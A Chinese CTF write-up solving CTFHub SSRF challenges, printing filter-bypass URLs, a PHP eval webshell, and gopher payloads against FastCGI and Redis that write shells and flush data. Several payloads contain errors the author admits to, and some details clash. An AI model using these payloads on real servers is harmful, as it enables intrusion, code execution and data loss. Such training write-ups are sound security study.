技术博客
首页 所有文章 标签 分类 关于
技术博客

目录

CTFHub技能树-Web-SSRF-解题方法

 收录于 个人分析总结
   约 2788 字   预计阅读 6 分钟 
https://bing.ee123.net/img/rand?artid=146080469
目录

CTFHub技能树-Web-SSRF 解题方法

https://i-blog.csdnimg.cn/direct/db30856dc7d749f58992e959b0348dc6.png

https://i-blog.csdnimg.cn/direct/ad03c3e2ec1f4c938f8f697f09e0d5e5.png

在URL地址栏,输入: /?url=http://127.0.0.1/flag.php

注意:将默认页面的"?url=“后的下划线“_“删掉。

127.0.0.1  和   localhost 都指的本机 ,均可访问。加上flag.php访问本机的php文件,得到目标Flag。

https://i-blog.csdnimg.cn/direct/bd7016444ca542769fde45e9cb2a113f.png https://i-blog.csdnimg.cn/direct/3d7d680f2f51471ca35efe40ef9ad431.png

将Flag填写并提交,闯关结束。

https://i-blog.csdnimg.cn/direct/54e946904e9b4d2983b55d08f8f51e79.png

https://i-blog.csdnimg.cn/direct/9c786356578b40358a518c0803577f35.png

读取Web目录下的flag文件:

首先 web目录是: /var/www/html/ ,本题Flag在该目录下的flag.php文件。

对于文件,使用file协议file://,URL输入:file:///var/www/html/flag.php 。

注意:三个/,例如:http://、file://           【协议的应用方法】

https://i-blog.csdnimg.cn/direct/3f84352c62334d84b00eb3454b354cd9.png

浏览器中,页面右击查看页面源代码,即可看到Flag码

https://i-blog.csdnimg.cn/direct/6e646dbd2f404c1593842175085c2974.png

提交Flag码,第二关结束。

https://i-blog.csdnimg.cn/direct/36ddb49c3b124918bffd978c6a1d1d1d.png https://i-blog.csdnimg.cn/direct/db9650720c26426ea5df40abd75011c3.png https://i-blog.csdnimg.cn/direct/96f89d1edf8348b18bdda21497d41ea0.png

对于端口8000-9000等单一变量的大量数据的变化,打开BurpSuite使用狙击手模式进行爆破。

首先打开BP的拦截,URL传值,输入:?url=127.0.0.1:8000,进行访问。

https://i-blog.csdnimg.cn/direct/bac1a93f8abd44b7ba541cdf531d37e4.png

将拦截的GET请求数据包发送至Intruder功能模块,设置端口位置8080作为payload位置,采用狙击手模式对单个payload进行爆破攻击。

https://i-blog.csdnimg.cn/direct/1ff6e0e2e4a74913b7f33795252e27fb.png

对爆破设置爆破字典,本例payload采用 数值类型,从8000-9000,间隔为1,逐个进行爆破。并点击开始攻击。

https://i-blog.csdnimg.cn/direct/3a33df58ee894272bafa33dae900df90.png

https://i-blog.csdnimg.cn/direct/5b6a8833a5f2421f8a982c7a06d46510.png

查看状态码200的结果,可看到目标端口为:8863 。

https://i-blog.csdnimg.cn/direct/0813e368ecdc4c71ab4ebaf868c4a8b3.png

输入:?url=127.0.0.1:8663

https://i-blog.csdnimg.cn/direct/75bb6a712b814d76972c6e19a8ea1f28.png

https://i-blog.csdnimg.cn/direct/70400a20c9a743fcbf0a300983d6fd10.png

URL必须包含

https://i-blog.csdnimg.cn/direct/1d44434d14294b889c6d430d4adb4756.png https://i-blog.csdnimg.cn/direct/68a3aaa2b2ae4a92a16efa345b8f2f11.png

URL输入: http://notfound.ctfhub.com@127.0.0.1/flag.php

https://i-blog.csdnimg.cn/direct/e87894a371b54bbb97e64c1bdb3e7acf.png https://i-blog.csdnimg.cn/direct/27f2d1f5273843e3b18481cc9585b628.png

https://i-blog.csdnimg.cn/direct/eb38d04034314b338da4007bc90fedce.png https://i-blog.csdnimg.cn/direct/e27d25d0f8dd4413b1fdbe3a163a7bd5.png

尝试127.0.0.1地址进行访问flag.php文件,发现127和172被禁用

https://i-blog.csdnimg.cn/direct/96db079517174c169cf48e0207bb2a14.png

可通过localhost替换127.0.0.1进行访问flag.php文件,即可看到Flag码。

https://i-blog.csdnimg.cn/direct/3c8080aef9fd4fddbc981f8d2f0fc249.png

也可以将127.0.0.1转换为16进制:0x7f000001。注意:此处,“.”用0表示。

输入:?url=0x7f000001/flag.php

得到Flag码,提交即可

https://i-blog.csdnimg.cn/direct/3c25ca9305d44734addd2031ef278e15.png

https://i-blog.csdnimg.cn/direct/89181b03742f408e8a0f8ed5246a40bb.png https://i-blog.csdnimg.cn/direct/653d3db6e89c4bf0a1053112da37fba4.png https://i-blog.csdnimg.cn/direct/defe6a557ef4487a815381af7645f7a0.png

输入:?url=127.0.0.1/flag.php  发现IP字段被Ban。

https://i-blog.csdnimg.cn/direct/0085c19cf3c14acf918652bf5c8cedd2.png

输入:?url=localhost/flag.php即可得出flag码

也可以使用:

?url=http://localhost/flage.php

https://i-blog.csdnimg.cn/direct/7507681b92884a8594ff04377f93f6e2.png https://i-blog.csdnimg.cn/direct/e384a09d83114d56a6218accdd777875.png

提交Flag码

https://i-blog.csdnimg.cn/direct/67591791dd824237acff07a517942962.png

https://i-blog.csdnimg.cn/direct/355249da594948b791eeb78fc98a0aa3.png

点开题目附件,发现URL有两层

https://i-blog.csdnimg.cn/direct/b5164e4c4da643f4a3b36f6e3614502f.png

使用网站: 对两个DNS进行拼接一个整体域名。

https://i-blog.csdnimg.cn/direct/c82edaa277a847beb42811b288c1b225.png

输入:?url=http://7f000001.7f000002.rbndr.us/flag.php

得出Flag

https://i-blog.csdnimg.cn/direct/1aa8e92561d94fb9b4741efb9b652ed9.png

提交Flag https://i-blog.csdnimg.cn/direct/c3298b98c264485b9bb0febf5ecb6a1a.png

https://i-blog.csdnimg.cn/direct/e36c1901f8b943a59c6c0bfe444297f0.png

输入:?url=http://127.0.0.1/flag.php

页面显示输入框,但无内容

https://i-blog.csdnimg.cn/direct/0c9a1b4951834a93af7467c1de0f7627.png

发现有注释的key值

key=87ad384658eb5321de6e61ec47566ecc

https://i-blog.csdnimg.cn/direct/364850adc04548b2aa07d6ccfc619c33.png

打开BP拦截,挂代理,将key值复制粘贴至页面的输入框中,点击回车提交key值,进行抓包,将Http头部中Host的ip修改为127.0.0.1:80

https://i-blog.csdnimg.cn/direct/9cf22a30ab3f47b38bde713c7e0ce2a5.png

gopher://127.0.0.1:80/  _POST  /flag.php  HTTP/1.1

Host: challenge-b8e8a5eb7300df63.sandbox.ctfhub.com:10800

Content-Type: application/x-www-form-urlencoded

Content-Length: 36

key=87ad384658eb5321de6e61ec47566ecc

2025/3/11   补充 :经讲解,发现构造请求时,gopher协议后的POST请求与端口之间多了一个空格,原本的意思应为为该端口的POST方式,所以修改为:gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1

https://i-blog.csdnimg.cn/direct/c39c0ffcfdb54958b2ce4ee6b3bb68b1.png

网站:

编码后:

gopher%3A//127.0.0.1%3A80/%20%C2%A0_POST%20%C2%A0/flag.php%20%C2%A0HTTP/1.1%0AHost%3A%20challenge-b8e8a5eb7300df63.sandbox.ctfhub.com%3A10800%0AContent-Type%3A%20application/x-www-form-urlencoded%0AContent-Length%3A%2036%0A%0Akey%3D87ad384658eb5321de6e61ec47566ecc

https://i-blog.csdnimg.cn/direct/373217513a274782b045750aab92c474.png

将%0A全部替换为%0d%0A,代码最后添加%0d%0A

https://i-blog.csdnimg.cn/direct/ac0192b1e4434574841cd313fd8c0ba4.png

gopher%3A//127.0.0.1%3A80/%20_POST%20/flag.php%20HTTP/1.1%0d%0AHost%3A%20challenge-b8e8a5eb7300df63.sandbox.ctfhub.com%3A10800%0d%0AContent-Type%3A%20application/x-www-form-urlencoded%0d%0AContent-Length%3A%2036%0d%0A%0d%0Akey%3D87ad384658eb5321de6e61ec47566ecc%0d%0A

二次编码结果:

gopher%253a%252f%252f127.0.0.1%253a80%252f%2b%252f_POST%2b%252fflag.php%2bHTTP%252f1.1%250d%250AHost%253a%2b127.0.0.1%253a80%250d%250AContent-Type%253a%2bapplication%252fx-www-form-urlencoded%250d%250AContent-Length%253a%2b42%250d%250A%250d%250Akey%253dkey%25253D8e7bc8cdc2ef6dd972ba9bce09ecb3e4%250d%250A

https://i-blog.csdnimg.cn/direct/739275be5bb948c1ae33e4da47c3fe1d.png

将gopher后和127.0.0.1后的冒号编码,还原为冒号(:),才有作用

https://i-blog.csdnimg.cn/direct/f80946fa198047bbb3469fea77495567.png

最终payload:

gopher://127.0.0.1:80/%2520_POST%2520/flag.php%2520HTTP/1.1%250d%250AHost%253A%2520challenge-b8e8a5eb7300df63.sandbox.ctfhub.com%253A10800%250d%250AContent-Type%253A%2520application/x-www-form-urlencoded%250d%250AContent-Length%253A%252036%250d%250A%250d%250Akey%253D87ad384658eb5321de6e61ec47566ecc%250d%250A

将修改后完整的代码输入URL,点击访问,即可看到Flag码   【我做不出来   望各位结果顺利】

https://i-blog.csdnimg.cn/direct/6212223f359b4e859cadce1b6ff6c7c3.png

https://i-blog.csdnimg.cn/direct/84aec823f88745c5ada5505e9d70d506.png

输入:?url=127.0.0.1/flag.php

出现上传文件页面,但无提交按钮

https://i-blog.csdnimg.cn/direct/5930643cd7404e289037227fd81a1bc1.png

F12–(Edge浏览器)元素,在浏览文件按钮后手动创建一个提交按钮:

选择file行,点击前面的三个点—-编辑为HTML,

元素,输入:

https://i-blog.csdnimg.cn/direct/369c6e620ef644ec94851a574c1ba948.png

https://i-blog.csdnimg.cn/direct/f93def3c61c448319c91de7e539de08f.png

https://i-blog.csdnimg.cn/direct/fb6c4169bb1a421d87c09e895ce70ba1.png

写一个一句话木马文件1.php,作为上传的文件

https://i-blog.csdnimg.cn/direct/24d677ba37e64f2a9708e570f47ca8ce.jpeg

https://i-blog.csdnimg.cn/direct/ca49a36180894c85abaf39b7be07c273.png

将编写好的一句话木马文件上传,捕包

https://i-blog.csdnimg.cn/direct/7ad8461d665e43ec844adad4a3e654a7.png

修改HTTP头部的Host字段:127.0.0.1:80

即gopher://127.0.0.1:80/_POST    flag.php   HTTP/1.1

结果为:  【下面都出错了,注意是:gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1】

gopher://127.0.0.1:80 POST /flag.php HTTP/1.1

Host: 127.0.0.1:80

Content-Length: 321

Content-Type: multipart/form-data;

——WebKitFormBoundaryXyfk6HxCj5FNB1uH

Content-Disposition: form-data; name=“file”; filename=“1.php”

Content-Type: application/octet-stream

——WebKitFormBoundaryXyfk6HxCj5FNB1uH

Content-Disposition: form-data; name=“submit”

鎻愪氦

——WebKitFormBoundaryXyfk6HxCj5FNB1uH–

https://i-blog.csdnimg.cn/direct/dea5f76eee004f5c96501092ff70ee34.png

在URL编码网站,将请求数据表URL编码。将编码结果复制在txt文件中,并把%0A替换为%0d%0A

https://i-blog.csdnimg.cn/direct/5c98bf7fe1a94b3b9e10e3e0c9302d2a.png

gopher%3a127.0.0.1%3a80+POST+%2fflag.php+HTTP%2f1.1%0aHost%3a+127.0.0.1%3a80%0aContent-Length%3a+321%0aContent-Type%3a+multipart%2fform-data%3b+%0a%0a——WebKitFormBoundaryXyfk6HxCj5FNB1uH%0aContent-Disposition%3a+form-data%3b+name%3d%22file%22%3b+filename%3d%221.php%22%0aContent-Type%3a+application%2foctet-stream%0a%0a%3c%3fphp+%40eval(%24_POST%5b%27cmd%27%5d)%3b%3f%3e%0a——WebKitFormBoundaryXyfk6HxCj5FNB1uH%0aContent-Disposition%3a+form-data%3b+name%3d%22submit%22%0a%0a%e9%8e%bb%e6%84%aa%e6%b0%a6%0a——WebKitFormBoundaryXyfk6HxCj5FNB1uH–

//将一次编码后的%0A  全部替换为%0d%0A,代码最后添加一个%0d%0A

https://i-blog.csdnimg.cn/direct/02d2e09d230f4892a05e673f87daf427.png

https://i-blog.csdnimg.cn/direct/22e53569f7604fa1901f38b41d912d15.png

编码后冒号也被编码,则gopher后面和端口号前的冒号需要还原

即 gopher://127.0.0.1:80/

注意:这里结果是正常的,因为是借鉴的。上面将gopher行错误修改后,再进行两次编码,结果就是下面的正确编码。

二次编码结果:

gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2

520127.0.0.1%253A80%250D%250AContent-Type%253A%2520multipart/form-data%253

B%2520boundary%253D—————————5278488452262243057143646468

5%250D%250AContent-Length%253A%2520379%250D%250A%250D%250A—————–

————52784884522622430571436464685%250D%250AContent-Disposition%253

A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%252

21.php%2522%250D%250AContent-Type%253A%2520application/octet-stream%250D%25

0A%250D%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255Bcmd%255D%2529%25

3B%253F%253E%250D%250A—————————–527848845226224305714364

64685%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%25

22submit%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%25E6%259F%2

5A5%25E8%25AF%25A2%250D%250A—————————–527848845226224305

71436464685–%250D%250A

https://i-blog.csdnimg.cn/direct/5ad54e2df2ca44659866e1c6d199bdd4.png

https://i-blog.csdnimg.cn/direct/656026bd93264fd7b85d24d1e08c6cdb.png

一句话木马:

base64编码后:

echo “PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+” | base64 -d > shell.php

项⽬地址:

git clone

执⾏命令:

python2 gopherus.py –exploit fastcgi

执行一句行木马,生成payload

https://i-blog.csdnimg.cn/direct/5407f6a8c0114fa380ac7409dbd83f0b.png

生成的payload:

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH119%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00w%04%00%3C%3Fphp%20system%28%27echo%20%22PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8%2B%22%20%7C%20base64%20-d%20%3E%20shell.php%27%29%3Bdie%28%27—–Made-by-SpyD3r—–%0A%27%29%3B%3F%3E%00%00%00%00

url编码后:

gopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH119%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500w%2504%2500%253C%253Fphp%2520system%2528%2527echo%2520%2522PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8%252B%2522%2520%257C%2520base64%2520-d%2520%253E%2520shell.php%2527%2529%253Bdie%2528%2527—–Made-by-SpyD3r—–%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

https://i-blog.csdnimg.cn/direct/f319c118e670457eac89b99fa3fe5241.png

https://i-blog.csdnimg.cn/direct/fe65d8f1a53a4fe1a7c50fb81591c8aa.png

编码器base64

https://i-blog.csdnimg.cn/direct/93c64c3b150449f1993f0b41714268a3.png

10.6 通过shell在目录中寻找flag

https://i-blog.csdnimg.cn/direct/ba7fabb3cd64455cbe00426cfea7b4bd.png

https://i-blog.csdnimg.cn/direct/b3c661b2553545f9ac81a90cb4faf51c.png

https://i-blog.csdnimg.cn/direct/dd81a853ae7f431784ebf204f2c140f3.png

Flag:ctfhub{11394f17ed3f340d46a0658b}

10.7 提交Flag码

https://i-blog.csdnimg.cn/direct/e74d4c969b4a4a5b9705edd6e0d6e7aa.png

kali,输入:python2 gopherus.py –exploit redis

使用PHPShell

/var/www/html/

写入一句话木马:

https://i-blog.csdnimg.cn/direct/d1085030b5e4444da041d54e8aee1b99.png

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2433%0D%0A%0A%0A%3C%3Fphp%20%40eval%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

URL编码后:

gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252433%250D%250A%250A%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527cmd%2527%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

https://i-blog.csdnimg.cn/direct/d572bc93450840c5b286045ae43620d0.png

https://i-blog.csdnimg.cn/direct/d00e3ab15f6c40faac307197b6f58c48.png

在页面的URL后输入,编码后的攻击载荷

https://i-blog.csdnimg.cn/direct/a9588dcc2c884aa1b2d189b8100bc080.png

再访问上传的shell.php文件,出现下图结果

https://i-blog.csdnimg.cn/direct/655abc5c11f8410da0a9a04ade6a40a7.png

将上一步访问shell.php文件的url复制,通过蚁剑进行连接

注意: 编码器为base64

https://i-blog.csdnimg.cn/direct/db96a2aff7f5404fb518793a22b95ad3.png

返回其根目录,找到flag文件,打开得到目标FLAG码

https://i-blog.csdnimg.cn/direct/732e7a311f8d4ee1b631497027bbfa64.png

https://i-blog.csdnimg.cn/direct/b7e9aee701734786bfbaa42546a3aaa5.png

https://i-blog.csdnimg.cn/direct/2abf52a2575342f39d04018892292a0c.png

flag码:ctfhub{f3bceed3f35dca3581e57040}

https://i-blog.csdnimg.cn/direct/acb50a3530484c9c9b59b1023a17cb82.png

更新于 2025-03-10
 Web
返回 | 主页